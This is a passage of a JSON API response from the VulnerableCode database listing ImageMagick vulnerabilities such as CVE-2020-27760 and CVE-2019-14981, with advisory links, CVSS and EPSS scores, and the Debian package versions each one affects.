"https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/5335-1/", "reference_id": "USN-5335-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5335-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27760" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "5.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g1ct-6d28-g3ab" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82600?format=api", "vulnerability_id": "VCID-gc9p-4vdm-rbah", "summary": "ImageMagick: division by zero in MeanShiftImage in MagickCore/feature.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-14981.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-14981.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00665", "scoring_system": "epss", "scoring_elements": "0.71159", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00665", "scoring_system": "epss", "scoring_elements": "0.71168", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00665", "scoring_system": "epss", "scoring_elements": "0.71185", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00665", "scoring_system": "epss", "scoring_elements": "0.7116", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00665", "scoring_system": "epss", "scoring_elements": "0.71202", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00665", "scoring_system": "epss", "scoring_elements": "0.71216", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00665", "scoring_system": "epss", "scoring_elements": "0.71239", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00665", "scoring_system": "epss", "scoring_elements": "0.71224", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00665", "scoring_system": "epss", "scoring_elements": "0.71208", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00665", "scoring_system": "epss", "scoring_elements": "0.71254", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00665", "scoring_system": "epss", "scoring_elements": "0.71261", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00665", "scoring_system": "epss", "scoring_elements": "0.71238", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00665", "scoring_system": "epss", "scoring_elements": "0.71292", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1757911", "reference_id": "1757911", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1757911" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=955025", "reference_id": "955025", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=955025" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { 